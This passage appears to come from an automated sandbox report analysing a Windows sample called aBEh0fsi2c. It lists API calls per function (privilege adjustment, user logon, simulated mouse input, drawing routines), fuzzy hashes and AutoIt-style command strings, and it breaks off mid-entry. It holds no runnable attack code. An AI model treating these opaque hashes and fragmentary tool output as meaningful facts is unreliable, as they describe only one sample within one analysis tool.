                                                            • Part of subcall function 0038520A: __aulldiv.LIBCMT ref: 00385233
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Time$FileSystem__aulldiv__time64
                                                          • String ID: 0eB
                                                          • API String ID: 2893107130-1534231516
                                                          • Opcode ID: 4bcfaa03c87d9f14309691819c12892384edc3a2f11ca1f504f40666854174ba
                                                          • Instruction ID: 4c0d334efea22ed266afc9c90f27bbaa2a661a5d41be218dc8cfca723f0b0471
                                                          • Opcode Fuzzy Hash: 4bcfaa03c87d9f14309691819c12892384edc3a2f11ca1f504f40666854174ba
                                                          • Instruction Fuzzy Hash: 7C21A2326256108BC729CF29D841B52B3E1EFA5311BA98E6CD0F5CB2C0CA74AD45CB54
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 003CC6FB
                                                          • FindClose.KERNEL32(00000000), ref: 003CC72B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID:
                                                          • API String ID: 2295610775-0
                                                          • Opcode ID: f852ac380d2bfc4b9ce01337c29451fae6412b27b5048ef2eeffd281f48710ce
                                                          • Instruction ID: e215cead3bd065fbeff468ef97beb8ba34ad8b0851e6bebd4cce988423287fd1
                                                          • Opcode Fuzzy Hash: f852ac380d2bfc4b9ce01337c29451fae6412b27b5048ef2eeffd281f48710ce
                                                          • Instruction Fuzzy Hash: 6D1182756002009FDB11DF29C885A2AF7E8EF45324F00C51EF9A9CB291DB70AC05CB81
                                                          APIs
                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,003D9468,?,003EFB84,?), ref: 003CA097
                                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,003D9468,?,003EFB84,?), ref: 003CA0A9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ErrorFormatLastMessage
                                                          • String ID:
                                                          • API String ID: 3479602957-0
                                                          • Opcode ID: ecdc7a938d0fab39ae0fa67aebdc5878cd473e4eb0e1d40cf9a0db8ac3b5336e
                                                          • Instruction ID: e9a39894c74f4f97762ad0a8630637fdbee9bff6b6a32aa8c6f5100b65ea71bc
                                                          • Opcode Fuzzy Hash: ecdc7a938d0fab39ae0fa67aebdc5878cd473e4eb0e1d40cf9a0db8ac3b5336e
                                                          • Instruction Fuzzy Hash: 0AF0823510522DABDB229FA4CC88FEA776CFF08361F008269F909DA181D7709D44CBA1
                                                          APIs
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003B8309), ref: 003B81E0
                                                          • CloseHandle.KERNEL32(?,?,003B8309), ref: 003B81F2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                          • String ID:
                                                          • API String ID: 81990902-0
                                                          • Opcode ID: c72ea4f988f1d80960ba3056c0dae933d1cd36db393d548c4d741993953122e6
                                                          • Instruction ID: d2f7ec27bc2ffa5e26c1be9fe06fc5de097a51c7feded5c05e2df67ac8001b00
                                                          • Opcode Fuzzy Hash: c72ea4f988f1d80960ba3056c0dae933d1cd36db393d548c4d741993953122e6
                                                          • Instruction Fuzzy Hash: 36E0E671011610AFE7672B74EC05D7777EDEF04315B14896DF55588470DB616C91DB10
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00388D57,?,?,?,00000001), ref: 0038A15A
                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0038A163
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 8723645a10973f231d96ef33a92cbcdda9447381201735653944b5600148869a
                                                          • Instruction ID: 9fc0a2891c899cf2d6d1949a25d3538415185ed22bc6b4ace57dc8f43b9fc39c
                                                          • Opcode Fuzzy Hash: 8723645a10973f231d96ef33a92cbcdda9447381201735653944b5600148869a
                                                          • Instruction Fuzzy Hash: 1BB09235054248AFCA122B91EC49B883F6CEB44BA2F404120F60D886A4CBA255508A91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2199619d16f740ab76fb638b3abcf49d51b0caa7720228d85a1b1a6fa612c310
                                                          • Instruction ID: 94cea69ebca3a010be17762b1c97f01544c36b5a603f033e90a408803e654f7f
                                                          • Opcode Fuzzy Hash: 2199619d16f740ab76fb638b3abcf49d51b0caa7720228d85a1b1a6fa612c310
                                                          • Instruction Fuzzy Hash: 1D32F521D29F414DD723A634D832336A64DAFB73D4F15D777F81AB5AA5EB29C8838200
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: decd6550ab92198d31e0cbbcb3af51534fdacd6af618eec7309e553489792ad1
                                                          • Instruction ID: ca469b3330785ddba35e45bb9ffc5ad33f3aa83c9f95127ef46de4e3ccd8f1c9
                                                          • Opcode Fuzzy Hash: decd6550ab92198d31e0cbbcb3af51534fdacd6af618eec7309e553489792ad1
                                                          • Instruction Fuzzy Hash: BDB10260D2AF414DD72396398871336BB5CAFBB2C5F52D71BFC2A74E22EB2185838141
                                                          APIs
                                                          • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 003C4C4A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: mouse_event
                                                          • String ID:
                                                          • API String ID: 2434400541-0
                                                          • Opcode ID: e0ea61ca6fde625e67a3e8a7ec91b9c5fd0c1c7c06a263481fa13fa00471ec24
                                                          • Instruction ID: 0869fbb83f2e72c7301d3662373f34a0accd2865aaffd6d7fb0f6bf38823d6e8
                                                          • Opcode Fuzzy Hash: e0ea61ca6fde625e67a3e8a7ec91b9c5fd0c1c7c06a263481fa13fa00471ec24
                                                          • Instruction Fuzzy Hash: F6D05E9116520938ED2E0720AE7FFBA010CE300782FD1E24D7102CA0E1ECC09C405330
                                                          APIs
                                                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,003B8389), ref: 003B87D1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: LogonUser
                                                          • String ID:
                                                          • API String ID: 1244722697-0
                                                          • Opcode ID: 03347e4bede9531efaf88cc6c81895b00b487ef9b566c0ed51be88aa4e7d57fe
                                                          • Instruction ID: 541b6b2f24b8e14358d83f7396721b263442b47654fd56005efedeff33904bad
                                                          • Opcode Fuzzy Hash: 03347e4bede9531efaf88cc6c81895b00b487ef9b566c0ed51be88aa4e7d57fe
                                                          • Instruction Fuzzy Hash: 2ED05E3226050EAFEF118EA4DC01EBE3B69EB04B01F408111FE15C50A1C7B5D835AB60
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0038A12A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: b073c756e92ecc296baa838702e8edc59671edab1e8e67f3e0e1b0f5f52250be
                                                          • Instruction ID: bf7c1880107007591ae2039c9e61e98cffcde5d1b02fee211000810603d6b043
                                                          • Opcode Fuzzy Hash: b073c756e92ecc296baa838702e8edc59671edab1e8e67f3e0e1b0f5f52250be
                                                          • Instruction Fuzzy Hash: 1BA0113000020CAB8A022B82EC08888BFACEA002A0B008020F80C882228BB2A8208A80
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1337653140.0000000000E76000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E76000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_e76000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Sk
                                                          • API String ID: 0-562419935
                                                          • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                          • Instruction ID: 8003b7719acedc31ba269e87d73d8ecd34e136ba242f99acd070df4bd4c9f066
                                                          • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                          • Instruction Fuzzy Hash: E601A478A00109EFDB48DF98C5909AEF7F5FF88310F208599E919A7306D730AE41DB80
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8ecb3b411864700896b0c08094adabfcea3f5def49b58808b2743885ca84ad28
                                                          • Instruction ID: 65c18eceeb6d7a82d877eee3cc1ca41ffa57d7473ae4fae47cbd75890446dc5a
                                                          • Opcode Fuzzy Hash: 8ecb3b411864700896b0c08094adabfcea3f5def49b58808b2743885ca84ad28
                                                          • Instruction Fuzzy Hash: 06222830A48546CBDF3B8B18C4987BC77A1FB41308F26C46AD64A8BD92DB78DD92C741
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                          • Instruction ID: 5242e599189f461e1a6de7c7a2e7a608dfcf9580c15bc5c6be906cf5e35a9e6a
                                                          • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                          • Instruction Fuzzy Hash: 73C184362052930ADB6F663A843413FFAA55EA27B131B47DDD8B3CB1D4EE10C969D720
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                          • Instruction ID: 5498737c918b1e34e90b3a72a3beeab4881fdaaf499d004d4fd30c258590ba76
                                                          • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                          • Instruction Fuzzy Hash: E2C165322052930ADF6F563A843413FBAA55EA27B131B47EDE4B3DB1D5EE10C929D720
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                          • Instruction ID: 2b84ba12e3487ed2233d1c19762ab3b6109c4ac75c93119588f75b99806507e7
                                                          • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                          • Instruction Fuzzy Hash: 62C1843220529309DF2F5639C47413EBAA95EA27B131B47EDD4B3CB1D4EE20C96AD720
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1337653140.0000000000E76000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E76000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_e76000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                          • Instruction ID: 3ecab91db3c0d0004e81d917c16e9a7bbd3ca20134d4c526e6823f61eddd97b5
                                                          • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                          • Instruction Fuzzy Hash: AC41A271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB90
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1337653140.0000000000E76000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E76000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_e76000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                          • Instruction ID: 01dc5c49fe6f87746e89a0d270e36b6e6807f6eae3191c2ca3201404422385d5
                                                          • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                          • Instruction Fuzzy Hash: 3E019278A01209EFCB44DF98C5909AEF7F5FF48310F208599E809A7306E730AE41DB80
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1337653140.0000000000E76000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E76000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_e76000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                          • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                          • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                          • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?,003EF910), ref: 003E3627
                                                          • IsWindowVisible.USER32(?), ref: 003E364B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpperVisibleWindow
                                                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                          • API String ID: 4105515805-45149045
                                                          • Opcode ID: 0b80d67fe27a95432494df5dab739f885dd5c0bef7a9b0d47c4a25506298d15a
                                                          • Instruction ID: 0f0448aa1331a45c2d916b896cde8ee8a7da4261f19692f38f30fcadce4595c2
                                                          • Opcode Fuzzy Hash: 0b80d67fe27a95432494df5dab739f885dd5c0bef7a9b0d47c4a25506298d15a
                                                          • Instruction Fuzzy Hash: A7D1CF702043509BCB0AEF11C45AAAE77E9AF85344F058569F8865F7E3CB35EE4ACB41
                                                          APIs
                                                          • SetTextColor.GDI32(?,00000000), ref: 003EA630
                                                          • GetSysColorBrush.USER32(0000000F), ref: 003EA661
                                                          • GetSysColor.USER32(0000000F), ref: 003EA66D
                                                          • SetBkColor.GDI32(?,000000FF), ref: 003EA687
                                                          • SelectObject.GDI32(?,00000000), ref: 003EA696
                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 003EA6C1
                                                          • GetSysColor.USER32(00000010), ref: 003EA6C9
                                                          • CreateSolidBrush.GDI32(00000000), ref: 003EA6D0
                                                          • FrameRect.USER32(?,?,00000000), ref: 003EA6DF
                                                          • DeleteObject.GDI32(00000000), ref: 003EA6E6
                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 003EA731
                                                          • FillRect.USER32(?,?,00000000), ref: 003EA763
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 003EA78E
                                                            • Part of subcall function 003EA8CA: GetSysColor.USER32(00000012), ref: 003EA903
                                                            • Part of subcall function 003EA8CA: SetTextColor.GDI32(?,?), ref: 003EA907
                                                            • Part of subcall function 003EA8CA: GetSysColorBrush.USER32(0000000F), ref: 003EA91D
                                                            • Part of subcall function 003EA8CA: GetSysColor.USER32(0000000F), ref: 003EA928
                                                            • Part of subcall function 003EA8CA: GetSysColor.USER32(00000011), ref: 003EA945
                                                            • Part of subcall function 003EA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 003EA953
                                                            • Part of subcall function 003EA8CA: SelectObject.GDI32(?,00000000), ref: 003EA964
                                                            • Part of subcall function 003EA8CA: SetBkColor.GDI32(?,00000000), ref: 003EA96D
                                                            • Part of subcall function 003EA8CA: SelectObject.GDI32(?,?), ref: 003EA97A
                                                            • Part of subcall function 003EA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 003EA999
                                                            • Part of subcall function 003EA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003EA9B0
                                                            • Part of subcall function 003EA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 003EA9C5
                                                            • Part of subcall function 003EA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003EA9ED
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                          • String ID:
                                                          • API String ID: 3521893082-0
                                                          • Opcode ID: 9d6e80baecc8bb005cbfbfca5b95eaa72f7e38d313b03dcfbda4bfd09cf97946
                                                          • Instruction ID: 077a6ce94cf0156eafc80ccb246686e1501b28c34f4b342dcd8b29c20cb9d0ba
